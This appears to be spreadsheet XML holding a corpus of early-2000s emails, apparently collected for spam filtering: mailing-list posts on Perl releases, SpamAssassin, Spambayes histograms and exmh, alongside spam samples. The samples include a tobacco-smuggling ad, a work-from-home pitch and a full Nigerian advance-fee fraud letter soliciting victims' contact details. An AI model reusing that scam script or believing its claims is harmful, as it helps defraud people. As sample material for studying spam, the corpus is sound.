 8qkuEelTZU1j+smsWIcZhq2cU44J7tl+6KDOsao9L5JpeKXIDDN5um9oYXIt5QEwCLgo06wiXN7v
 KhF7vxX7Pbhjc7oPda10OkKWjlHEDbo4jngsKqRLj2HQcI4iOJ20BEnQIugUoogJ1LjEyG8ItKs4
 kbTsix9wi1r7HQK91DTZUG6IabIzdUtd27eEUQr3d4Q+g28pw0Kp33unyAb2PhD67haQqnxVyh3R
 dQuXHW+UhaucSblNM9o1GUOu86u5Q43VkBEcnlCTLeEI08ryhN3HUojwo3XcTU7X2icR0ucmFmJS
 0aqQpmGDhGgX2VLJJ5coqlE4gkfiMi95JcUZQjVTiVdSd1h60flGROJt8VbXKUA3+SmganUjZfZy
 qM1u52ybkf165lf/xAAmEAEAAgICAgIBBAMAAAAAAAABABEhMUFRYXGBkbGh0eHwEMHx/9oACAEB
 AAE/IciSgHMLIteP3mzYyukGEzcoOTKvVTBx1Dt0uoaLOUWcYlL+pgXKucsXl1XZLmQ1fb5ZuQ8L
 gGWXQ6hvAtumoy9ih4wqy/U0AO1wPGXZGjiJ66alwIMFVSmXIdtxhb3qZZB5n4CYzZjW2eCElhGa
 scR5VUOW/dCoEd0MN9RKDKDFS9m5/NjXqu46PKKuTWksZhupd55+J8Oh1HUdQF6mOKMhlLzjmA4g
 NhgmVRh0JUPPzmWqewfhE2FeU1MavmMGly6jsd21mPuBW/vAr1izSNuIKgeQnBJ7lQeJ4aAl+9xK
 fzTjUWQMRagNlYojlgaBn+3MtFyoP3iMQGNENzwhONj3B38UzPI13GujERWezUcXcoOPzmWKQvcs
 dPaqpJRkCw9RxsC7Uw8Ssnn1DzXboisxDJDIKlq2pdPTBqwc0EfsqLU50TGGmklVHyrti7g9qoOW
 97TMTLRy/Moi7sDuFSoODg/ebkiOMlsjrJ1EqWYU3KLV+kEHiV6jEZCPyRmAlGilc0DZe4q0v6eY
 7I8qlNfeYFFU5WPrhwfmXH6hcEVg4NJVbxMN1e5QBXpJE6EyveZkrRFqMHddKl5pTJWVlMDgdR5O
 5dsbXmmpy7lLTfEFJvF7gVna/BnOcTgIsr4mh98r/rxCaRkOouDtnL3DKNTDoiQEpK0+JcK2uph/
 Phi/TgjEdCz8EsAozULoOM+Bw9kZhlWWGbwmclUxaCGzl/KJkWKfMeyBm4iUPmh2y2vEFMJM+YXh
 Rc8ob8yxUWsOYCmualrXhSMaCYYQLHLd+0pRv1eamosL2X/uCh33CNQv2JdePjAjMeEs3ecmuYNu
 jjldwPNZloHqUh7IrQxuMPYhMiLLHmJrYvcqw2AjIJ4Dmc/VmL4lyYD2JqEt5VEViGm5GTVAYnJA
 hVBGIMGBs2RngVucRCuqJw/UlenVQ3XzG2srg4lukpaa7/5Nwq9zLIA6Pklx1NlV2TyhILWjJNRF
 kaFdRVG7Lc/xQMqLJcVNe6uoAtz6hV+FxuQDoNRoN4MiHoQxfLKtNhMPQgKvqJ9UBkBmtxNXWJ5F
 wEGcBCpaILmN80mRbCbJHUP/2gAMAwEAAgADAAAAEGfyn6b8u+/kcITJuK3/AIbPKfvdczHpvCJa
 g9+o7ABcwIJS1gH4y8lB+/OJ3wAKIP8A/8QAHxEBAQEBAAIDAAMAAAAAAAAAAQARITFBEFFxYZHw
 /9oACAEDAQE/EG+iB/vef79t9X7PA9+o4r4zsmPIGEDzBTt6N5E0CPAxG7Ytqcv5tdRrzGxs6wkx
 z41y1LLQ14vz4wY10iN8L3yR1GxNUsDsDdmV7TA7CMI2cw7I4G3cR0a7DB75ttdSs8uQggsR8xzp
 8Pfy9y7fUX//xAAfEQEBAQEBAAEFAQAAAAAAAAABABEhMUEQUWGRoXH/2gAIAQIBAT8QJeR5c+Pf
 0/kbaMDv5ZpBp5+D9SU77LZck3I2AtO0xkGpb0TyxnbQ2xeJHkLliaHWcsGWggEHL1udnPh29Gdt
 IUxuyy2h5YDPvzFh6x52OQssgX+2djJTPIjrkWPhMChuQfC0+0+Jxke2RE5avHlkDtsDv233uQKR
 NQ4f2W8H6GInz6H5i//EACUQAQEAAgICAgICAwEAAAAAAAERACExQVFhcYGRobHRweHw8f/aAAgB
 AQABPxBfMznK5jRoYWQ7XrOPz2ddnwmS2cLDLJVQ6MQwHKWjPnHAa8v+1g8WzobVTxOsmGpo2G+8
 QEu71nZWGjOBZKAVw4oDRh4pYTKu4+cANNFWhv8AZi0wToU+njrJiCup0Y8zx+c5iAHYvmgnXjAs
 eYGro1LrZz77wJuuSa9N3Sv476UIk6fpePNOcmICuiD41lcCHjCPCp71icFOc09sDF3QPSTDyYYV
 J5krfnETCLi4X8qmDRtdbFw1UXwY/wAZvKvuYuKxHYa64bjJUA5yGEOaSYam+hWeZhwQ1T6yjZ4F
 b694R4CQUS8lJ8TCVIhxq8fH/uL8QL8twj1LSG7VEnjvjPeThiOHy39uOCLCfHNZ+f1jRUlNKqfy
 YWprbHaTXw4tzQCOhY/q45eacW9+qYMZzZ4U393xjW7t/GCeu8MhpSd+DpX3THg5eI9IVn5XPena
 xMQ6K+jOchRQa0TwHyv3iADvwwRxRrvHY6cEatBENdC70buBC0n1jqKaCJPvc9XLu6eAY12lX8YE
 WkH0AZOHRXlp5neUxmrw8I/ODvHVWvA4dj7BEt1vXnClDlB/A6OsCErTVfVfBXPLJNg8btETd23r
 I+hquDo/Qozg9/GjvGpggVfObo8CSscJHj6xs7pz8ZIntux6xUAJwI5q7cDwZZp9EcZZE/24qfXO
 I7dGORH9YhrFZejb3zh1cfsp/vF/sAgcvVxNhI/MesYGakQqsI8bwkLPcZM4CPYnzBwUkgUfrEHO
 fQYu/EcppV/jjz1m9Ca61OjIIUq7rhHw3reQvTT8ffj43hZmjUcZaP1w+8UFIStg913m7mzqjvvl
 f62YwbQKdeeuZfxlJeBkJqOIxvyTeGqpCS4n69FHZw9unFs8tPxhe9ATDNvosj6bPeSn07HAGKhw
 BeKcf7xSIeCzBCDltUNzpZfeEQ3acf4v+ce89Ltb2qayikgtCd8k+cg7JLNX0FMuzHmBPzg6pN4j
 3vXjBv8AP+MKltb5YYxWJboT9a/rHEa0oRCxjtLhI6IwXPfy/i4maKPYnYfWQlQ1Hlt2ffAvFceQ
 lQrq+vM/vBQHurWu1S75nWQO0COX1vDhiDb1Ha7N7sc3NzFdvy8uIMIabzFdbeI9eNXBCq2q/GC6
 +OAK5HVw03s+L0NvnxFyEm9OJjDuobHl9fB+8IsHvKIV9Fy1cIB6owhIEgKu8eEE1FQ6eVe/fjCY
 Ss8G2Y/lup315Ht6MvaqArnlWw5PV7x2rxP6xCQsUXT6xyREkJy+9SXjOWNe87x2TQ/+RNXCQFhS
 B71i4W4YUHR3nAnIpKYx7aO+E+7D8YsBoWhHxichNgM2vHHeXVAJZwwn6TWx5D1lbyZ46xYzgPTh
 WILqCed4irqgXpHD9uafsjinTrnGUgliieXb27cVs9JnICOiPjn85c9hWYiaKe5fJkPEcUQ+A4wp
 T2ZAXXPXo7+scAcK4j1jAm6AF9tY9OQjROg6f+5GCX/jAVqQ+GNi1KKL8dGLVHUquknj/pgWyuoi
 OKUMQVrcVeNdYyiW8qjo17xNq+C/hgo7KA9Fa7f8YehAgkp/I8Jg8BsUDxo7N8Y6DXAcVFniW+vR
 6xOExAHRMFOFvxcXlhNCtR4D+/oUSYikeAODXjKlaSW75neqbceTUrARyPp/IEdp6w2m9or7vGKU
 0WIeR1fA1jKoXKr9veAMNZVGtsNt4XWCVTjQYchumEuoH9YxhvK+CZdkFXEZoSAsk8h06xaBUtnj
 fjPAR8N/eXeQOcNa8Pr1jh9YOJ56ySCygh+riOou3kPrI3voywUN8Xz/ABgUUi2l76r548zFqdAQ
 PVZgq/oMuIf5/wDV5Ra/jAtN5Org6pxjheXJi6pBwBMA4XbZcga5yDEeAwoLPLMAhBfGFAjwNY7p
 Xy5DBThTjGGMG38Z/9k=
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0--
 _______________________________________________
 Avfs mailing list
 Avfs@csibe.fazekas.hu
 http://www.fazekas.hu/mailman/listinfo/avfs
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-07-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Last Call for Papers for YAPC::Europe::2002
     * Perl 5.8.0 Released
     * Parrot 0.0.7 Released
 +--------------------------------------------------------------------+
 | Last Call for Papers for YAPC::Europe::2002                        |
 |   posted by pudge on Friday July 19, @03:30 (yapce)                |
 |   http://use.perl.org/article.pl?sid=02/07/18/1430255              |
 +--------------------------------------------------------------------+
 [0]Richard Foley writes "Share your 'pe[a]rls of wisdom' with the Perl
 community: attendees from all around the world, gurus and geeks alike,
 will converge on Munich for [0]YAPC::Europe Sept. 18-20 to listen to the
 talks and tutorials presented at this gathering of minds. This year's
 theme is 'The Science of Perl', which means that we would really like to
 hear about suggestions for talks, projects, experiences which involve
 both perl and science. This should not be regarded as a restriction, more
 as a 'nice to have' :-) Proposals may be submitted between January 1st
 2002 and July 30th 2002."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/18/1430255
 Links:
     0. http://www.yapc.org/Europe/
 +--------------------------------------------------------------------+
 | Perl 5.8.0 Released                                                |
 |   posted by hfb on Friday July 19, @09:29 (releases)               |
 |   http://use.perl.org/article.pl?sid=02/07/19/038259               |
 +--------------------------------------------------------------------+
 [0]jhi writes "After more than two long years of hard work, the
 perl5-porters is proud to announce Perl 5.8.0. The most important new
 features are enhanced Unicode and threads support, and the new I/O
 subsystem called PerlIO, but there are lots of new goodies, not to
 mention bazillion bug fixes.
 The full [1]announcement is available, and you can read [2]what is new in
 5.8.0, and if you like what you see, start [3]installing.
 Since this release has extensive support for non-Latin scripts, we also
 translated the announcement to [4]Traditional Chinese (Big5-ETEN),
 [5]Simplified Chinese (EUC-CN or GB2312), [6]Japanese (EUC-JP), and
 [7]Korean (EUC-KR) (by Autrijus Tang, Dan Kogai, and Jungshik Shin).
 [8]ftp://ftp.cpan.org/pub/CPAN/src/perl-5.8.0.tar.gz is the main URL to
 use, but of course any CPAN mirror will do once they catch up.
 Share and Enjoy!
 -- Jarkko Hietaniemi, on behalf of the Perl5 Porters"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/19/038259
 Links:
     0. mailto:jhi@iki.fi
     1. http://dev.perl.org/perl5/news/2002/07/18/580ann/
     2. http://dev.perl.org/perl5/news/2002/07/18/580ann/perldelta.pod
     3. http://dev.perl.org/perl5/news/2002/07/18/580ann/INSTALL
     4. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.big5-tw
     5. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-cn
     6. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-jp
     7. http://dev.perl.org/perl5/news/2002/07/18/580ann/p580ann.txt.euc-kr
     8. ftp://ftp.cpan.org/pub/CPAN/src/perl-5.8.0.tar.gz
 +--------------------------------------------------------------------+
 | Parrot 0.0.7 Released                                              |
 |   posted by pudge on Friday July 19, @13:40 (parrot)               |
 |   http://use.perl.org/article.pl?sid=02/07/19/1346238              |
 +--------------------------------------------------------------------+
 [0]DrForr blesses us with version 0.0.7 of Parrot, including Perl 6
 grammar and a small, but functional, compiler. Full announcement is
 below.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/07/19/1346238
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/19/1346238
 Links:
     0. mailto:jgoff@perl.org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</si>
  <si>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On Fri, 6 Sep 2002, CDale wrote:
 &gt; It also depends on what the fad is or what is in style.  (:
 DNA's idea of fads is on the 100 kiloyear scale, unfortunately. As long as
 current fads don't involve in-vivo rewrite of the genome, homeoboxes
 including (now there's a problem for you, homeoboxing the adult), they're
 not all that smart an idear.
 &gt; Actualy our silly antiquated ideas about relationships and love have
 &gt; resulted in the bleedings of many upon many a page (and musical
 &gt; instrumnet, and canvas)  What's the problem if we dash a little Mrs.
 Art is sure nice. However, if art is our first priority we're kinda
 fux0red, if we've set our sight on a sustainable culture.
 &gt; Dash on them?  (:  Or cayenne.  Or ginger. (mm ask me about ginger
 &gt; root play).
 &gt; 
 &gt; And let me tell you this: just because a child happens to be
 &gt; single-parented (what a word), does not mean that child is
 &gt; dysfunctional or lives in a dysfunctional home.  The govt/media/church
 Our firmware is not built to be single-parented. You can counteract that
 somewhat by exposing the kid to a community of close friends, but not too
 many do that.
 &gt; has tried to make it look like there is a disintegration, when in
 &gt; fact, there is a coming together of other family members and friends
 &gt; to raise children.  It's not decaying -- it's changing.  Nothing wrong
 &gt; with change.
 I don't know what exactly is wrong, but something is definitely wrong.  
 This is way too important to be left to just our intuition of what is
 right and what is wrong.
 &gt; &gt; At least from the viewpoint of demographics sustainability and
 &gt; &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt; &gt; something wrong.
 &gt; &gt; 
 &gt; &gt; Maybe we should really go dirty Tleilaxu all the way.
 &gt; &gt; 
 &gt; 
 &gt; Maybe y'all should buy m-w some more bandwidth.
 m-w?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; would have had to invent it.  
 A Republican once said "I am not a crook".
</t>
  </si>
  <si>
    <t xml:space="preserve">At 4:34 PM -0400 on 10/2/02, R. A. Hettinga wrote:
 &gt; --- begin forwarded text
 &gt;
 &gt;
 &gt; Status: RO
 &gt; Delivered-To: fork@spamassassin.taint.org
 Sigh. Shoot me, now...
 My apologies.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</si>
  <si>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Justin Mason wrote:
 &gt; Phil R Lawrence said:
 &gt; 
 &gt; 
 &gt;&gt;&gt;something to watch out for is to use "nomime" =&gt; 1 in the Mail::Audit
 &gt;&gt;&gt;ctor; the M:A folks changed the API there.
 &gt;&gt;
 &gt;&gt;What has MIME to do with it?  I read in perldoc M:A that your suggestion 
 &gt;&gt;is less expensive, but how does that help S:A?
 &gt; 
 &gt; 
 &gt; M:A, for some reason, changes its base class depending on whether the
 &gt; incoming message is mime or not.  Therefore the Mail::Internet methods
 &gt; suddenly become unavailable for MIME messages...
 &gt; 
 &gt; (you do *not* want to know what I thought of that when I found it ;)
 As a new user of SA, I guess I'm having trouble connecting the dots.  If 
 I understand you:  If I don't use the "nomime" =&gt; 1 option and I recieve 
 MIME mail, the Mail::Internet modules become unavailable.
 Unavailable for which?  MA?  SA?  What do these methods do?  Does this 
 mean my incoming MIME mail won't be checked by SA unless I specify 
 "nomime" =&gt; 1?
 Thanks,
 Phil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</si>
  <si>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[Spambayes] Current histograms 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt; Tim Peters wrote
 &gt; We've not only reduced the f-p and f-n rates in my test runs, we've also
 &gt; made the score distributions substantially sharper.  This is bad news for
 &gt; Greg, because the non-existent "middle ground" is becoming even less
 &gt; existent &lt;wink&gt;:
 Well, I've finally got around to pulling down the SF code. Starting
 with it, and absolutely zero local modifications, I see the following:
 Ham distribution for all runs:
 * = 589 items
   0.00 35292 ************************************************************
   2.50    36 *
   5.00    21 *
   7.50    12 *
  10.00     6 *
  12.50     9 *
  15.00     6 *
  17.50     3 *
  20.00     8 *
  22.50     5 *
  25.00     3 *
  27.50    18 *
  30.00     9 *
  32.50     1 *
  35.00     4 *
  37.50     3 *
  40.00     0 
  42.50     3 *
  45.00     3 *
  47.50     4 *
  50.00     9 *
  52.50     5 *
  55.00     5 *
  57.50     3 *
  60.00     4 *
  62.50     2 *
  65.00     2 *
  67.50     6 *
  70.00     1 *
  72.50     3 *
  75.00     2 *
  77.50     4 *
  80.00     3 *
  82.50     3 *
  85.00     6 *
  87.50     8 *
  90.00     4 *
  92.50     8 *
  95.00    15 *
  97.50   441 *
 Spam distribution for all runs:
 * = 504 items
   0.00   393 *
   2.50    17 *
   5.00    18 *
   7.50    12 *
  10.00     4 *
  12.50     6 *
  15.00    11 *
  17.50    10 *
  20.00    10 *
  22.50     5 *
  25.00     3 *
  27.50    19 *
  30.00     8 *
  32.50     2 *
  35.00     0 
  37.50     1 *
  40.00     5 *
  42.50     5 *
  45.00     7 *
  47.50     2 *
  50.00     5 *
  52.50     1 *
  55.00     9 *
  57.50    11 *
  60.00     6 *
  62.50     4 *
  65.00     3 *
  67.50     5 *
  70.00     7 *
  72.50     9 *
  75.00     2 *
  77.50    13 *
  80.00     3 *
  82.50     7 *
  85.00    15 *
  87.50    16 *
  90.00    11 *
  92.50    16 *
  95.00    45 *
  97.50 30226 ************************************************************
 My next (current) task is to complete the corpus I've got - it's currently
 got ~ 9000 ham, 7800 spam, and about 9200 currently unsorted. I'm tossing 
 up using either hammie or spamassassin to do the initial sort  - previously
 I've used various forms of 'grep' for keywords and a little gui thing to 
 pop a message up and let me say 'spam/ham', but that's just getting too, too
 tedious.
 I can't make it available en masse, but I will look at finding some of
 the more 'interesting' uglies. One thing I've seen (consider this 
 'anecdotal' for now) is that the 'skip' tokens end up in a _lot_ of the 
 f-ps.
 Anthony
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cheap Fags
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam
 If you are fed up of being 'ripped off' by the British government every time you buy your tobacco, then you should visit our website, where you can now buy 4 cartons of cigarettes, or 40 pouches of rolling tobacco from as little as 170 Euros (approx 105 pounds), inclusive of delivery by registered air mail from our office in Spain.  
 Why pay more???
 Visit our website at
 http://www.smokesdirect.com/?ID=2
 Best regards
 Sales Department
 Smokes Direct
 Spain
 xay2158961y
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call me on My Telephone Number 234-80-33357110
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear friend,
 May I briefly introduce myself to you. I am Hajia Maryam Abacha, the wife of late Nigerian Head of State, General Sanni Abacha, who died on the 8th of June 1998. ever since the death of my husband, my family has been facing a lot of problems mostly with the present civilian government. Consequently, my son - Mohammed Abacha has been under torture in detention for a sin he did not commit and made to make a lot of confessions as regards valuables and money, including that of my late husband entrusted in his hand for safe keeping. 
 The latest is the confession of the US$700,000,000.00 (Seven Hundred Million United States Dollars) cash his late father gave him for safe keeping. Please check News watch Magazine of May 8th / 15th, 2000 issue on [Website:http://www.newswatchngr.com] to confirm the above story. Also the recent publication by this day Newspaper on Thursday March 1st Edition, which London Court clear ways for more recovery of Abacha's family looted money. Please confirm this issue on website; http://www.thisdayonline.com, click the Archieve/2001/March 2001/Thursday March 1st.
 On this note, I deposited a total sum of US$40,300,000.00 (Forty Million, three hundred thousand United states Dollars) sometimes March last year with a security company abroad (name withheld for now). Normally, we (1 and Mohammed Abacha) usually do such transactions, by first sending the money out by cargo to security company outside Nigeria, as photographic materials.
 And thereafter go to the security company for claims before transferring it to any bank of our choice. Presently, I cannot travel out of Nigeria, because, if you have gone through the above mentioned website address, you will see how my son's confessions had implicated my husband and in fact the whole of my family. This has actually caused the federal Government of Nigeria to confiscate our International passports, frozen every of my family member's bank accounts, both home and abroad, even our properties. 
 My problem now is, I want someone that can assist me move the US$40,300,000.00 (Forty Million Three Hundred Thousand United States Dollars) out from the Security Company and move the money to your country.
 I shall be ready to negotiate with you any percentage you might want from the sum. On your advice I shall be ready to invest my own share of the sum in your country. I assure you that there will be no problems at all in the course of moving out the money. Please kindly contact me on my e-mail:mrsabacha_11@mail.com or FAX 234-1-7590893, I shall so much appreciate your immediate response for full details of the business which shall be given to you by my second son Mallam Mustafa Abacha. You should note also that my son - Mallam Mustapha Abacha shall handle all cases as regards this business; as he is well abreast with this transaction for I do not have access to telephone lines now because they have been tossed by security agents and my movement is being monitored. I would like my son (Mallam Mustafa Abacha) to settle down  or be involved in a dating relationship with any lucky foreign lady at the successful completion of the transaction.
 In acknowledgement of my proposal, I would want you to furnish me with your telephone number, fax number and address so as to enable my son whom will be dealing with you directly to easily have you communicate as to how you will receive this money on our behalf risk-free.
 Thanking you in anticipation to your kind understanding and cooperation. I am looking forward for a healthy business relationship with you  and my entire household. 
 Hoping to hear from you.
 Best regards,
 Hajia Maryam Abacha.
 Call me on My Telephone Number 234-80-33357110
 please for security reasons reply through to the fax number FAX 234-1-7590893 instead of the email as it is general to all the family member.
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt;     Also- I noticed this repo has about an 8K bandwidth.  Is there a way
 &gt;     I can put this behind the others, so I don't hammer it for things
 &gt;     that are at other repos?  I'm respectful about bandwidth, having
 &gt;     lived on dialup for so long.  Now I'm on fiber optic and it's a whole
 &gt;     other world...
 Sure, just use "os" and "updates" from apt.freshrpms.net for instance then
 add the lines for that repository with only the module you want/need (here
 it's "testing73" I guess).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</si>
  <si>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Re: Does Your Bank Account Have Room For More Money?                         14249
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;Serious professionals only&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"center"&gt;
 &lt;center&gt;
 &lt;table border=3D"0" width=3D"657" height=3D"1150"&gt;
 &lt;tr&gt;
 &lt;td valign=3D"top" width=3D"449" height=3D"29"&gt;
 &lt;p align=3D"center"&gt;&lt;marquee width=3D"80%" scrolldelay=3D"0" behavior=3Dal=
 ternate&gt;* * * DOW JONES UNDER 10,000 * * * NASDAQ REMAINS UNDER 2000 * * *=
  TECH INDUSTRY LAYOFFS * * * FED CUTS RATES AGAIN TO AVOID RECESSION * * *=
  AOL LAYS OFF 1100 * * *&lt;/marquee&gt;&lt;/td&gt;
 &lt;td width=3D"4" height=3D"29"&gt;&lt;/td&gt;
 &lt;td width=3D"163" height=3D"29"&gt;&lt;/td&gt;
 &lt;td width=3D"2" height=3D"29"&gt;&lt;/td&gt;
 &lt;td width=3D"7" height=3D"29"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td valign=3D"top" rowspan=3D"5" width=3D"449" height=3D"1113" bgcolor=3D"=
 #E4DAB1"&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" color=3D"#FF0060"&gt;Are you a trained p=
 rofessional who works
 hard to provide for your family?&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6"&gt;Are you at all concerned about:&lt;/font=
 &gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;blockquote&gt;
 &lt;ul&gt;
 &lt;li&gt;
 &lt;p align=3D"left"&gt;&lt;font size=3D"4"&gt;The current economy?&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;p align=3D"left"&gt;&lt;font size=3D"4"&gt;The current job market?&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;p align=3D"left"&gt;&lt;font size=3D"4"&gt;Your family's future?&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;p align=3D"left"&gt;&lt;font size=3D"4"&gt;Your retirement?&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p align=3D"left"&gt;&amp;nbsp;
 &lt;/blockquote&gt;
 &lt;/blockquote&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" color=3D"#FF0060"&gt;Does this also desc=
 ribe
 you?&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;ul&gt;
 &lt;li&gt;A working professional providing for your family&lt;/li&gt;
 &lt;li&gt;College educated and over 5 years of professional experience&lt;/li&gt;
 &lt;li&gt;Looking to add extra income - by working from home&lt;/li&gt;
 &lt;li&gt;NOT interested in any multi level marketing effort or expensive franch=
 ise&lt;/li&gt;
 &lt;li&gt;NOT interested in contacting anyone you know to sell any product
 or opportunity&lt;/li&gt;
 &lt;li&gt;Concerned about the recent softness in the economy and the job
 market&lt;/li&gt;
 &lt;li&gt;Interested in adding significant extra income to improve the
 quality of your life&lt;/li&gt;
 &lt;li&gt;Willing to put in the hours, investment and time needed if you
 were sure that this was for you&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#FF0060"&gt;If you can identify with what =
 we
 are talking about, and you are a skilled professional looking to
 maximize whatever spare time you might have to increase your income,&lt;/font=
 &gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#FF0060"&gt;Then take a moment and fill ou=
 t
 the form below.&amp;nbsp; I would like to show you how you can make an
 additional $100,000 per year, from the comfort of&amp;nbsp; your home,&amp;nbsp;
 WITHOUT MLM's, MONEY GAMES or PYRAMID
 SCHEMES.&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#FF0060"&gt;This is a professional home
 based business opportunity.&amp;nbsp; You will be fully trained and
 supported in your new enterprise.&amp;nbsp; We have a state of the art
 marketing system for your use,&amp;nbsp; which will help you in your
 efforts.&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"left"&gt;I am looking to teach a handful of people what I have
 learned about making a significant monthly profit through DESIRE and
 DIRECT SALES.&amp;nbsp; This is a serious financial product and it WILL
 create serious income for you if you have the drive to create it.&lt;/p&gt;
 &lt;p align=3D"left"&gt;We have NO quotas, silly commission charts to learn
 or gimmicky tricks.&amp;nbsp; This is serious business for the serious
 person.&lt;/p&gt;
 &lt;p align=3D"center"&gt;***********************&lt;/p&gt;
 &lt;p align=3D"center"&gt;Call Today!&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"5"&gt;1-888-406-6041&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;************************&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;p&gt;&amp;nbsp;
 &lt;p&gt;&amp;nbsp;
 &lt;p&gt;&lt;a href=3D"mailto:deenapaco31@hotmail.com"&gt;remove click here&lt;/a&gt;&lt;/td&gt;
 &lt;td rowspan=3D"5" width=3D"4" height=3D"1113"&gt;&lt;/td&gt;
 &lt;td align=3D"center" valign=3D"top" width=3D"163" height=3D"142"&gt;&lt;/td&gt;
 &lt;td rowspan=3D"5" width=3D"2" height=3D"1113"&gt;&lt;/td&gt;
 &lt;td valign=3D"top" rowspan=3D"5" width=3D"7" height=3D"1113"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3D"center" valign=3D"top" width=3D"163" height=3D"832"&gt;After 12 =
 years on Wall Street
 as a VP, I am glad I started this home based business.&amp;nbsp; This is a
 serious financial product that changes the lives of those I introduce it
 to.&amp;nbsp; I no longer work on Wall Street.&amp;nbsp;&amp;nbsp; I make the money
 I made and more.&amp;nbsp; I'm finally living the life of my dreams . . . 
 &lt;p&gt;Kevin from NYC&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Call Today!&lt;/p&gt;
 &lt;p&gt;1-888-406-6041&lt;/p&gt;
 &lt;p&gt;************************&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3D"center" valign=3D"top" width=3D"163" height=3D"41"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3D"center" valign=3D"top" width=3D"163" height=3D"41"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align=3D"center" valign=3D"top" width=3D"163" height=3D"41"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Paul,
 That is the way I am doing right now, but I would like to NOT use the mouse 
 for such things. Any other clue?
 -- 
 Saludos,
 Ulises
  Speaking words of wisdom ...
 &gt; In a message dated: Thu, 22 Aug 2002 13:03:57 CDT
 &gt; Ulises Ponce said:
 &gt; 
 &gt; &gt;Thanks Tony, but I think doing it using component files will get a .signature 
 &gt; &gt;by default, but I have many diferent signatures and I want to insert one of 
 &gt; &gt;that signatures using a keyboard command. So for a message I will insert a 
 &gt; &gt;signature, but for another message I will insert a different signature.
 &gt; &gt;
 &gt; &gt;Is it possible? I am using sedit for my messages.
 &gt; 
 &gt; Ahm, if you don't object to using a mouse for such things, exmh has 
 &gt; the ability to insert different sigs on demand.  Create a bunch of 
 &gt; different sig files, all beginning with .signature, and at start up, 
 &gt; exmh will load them all.  In the Sedit window, you'll see a Sign...
 &gt; menu item which will allow you to select between each of the listed 
 &gt; .signature files for *that* e-mail.  You can actually use several if 
 &gt; you'd like (though I don't remember what Preferences... option allows 
 &gt; for this).
 &gt; 
 &gt; However, the signature gets added on send, not inserted directly into 
 &gt; the existing Sedit window prior to composition.
 &gt; 
 &gt; I currently have 6 different sig files I can choose between.
 &gt; 
 &gt; Additionally, if a .signature file has the execute bit turned on, 
 &gt; exmh will attempt to execute the file and use the stdout of the 
 &gt; script as your signature.
 &gt; 
 &gt; I hope this helps some.
 &gt; -- 
 &gt; 
 &gt; Seeya,
 &gt; Paul
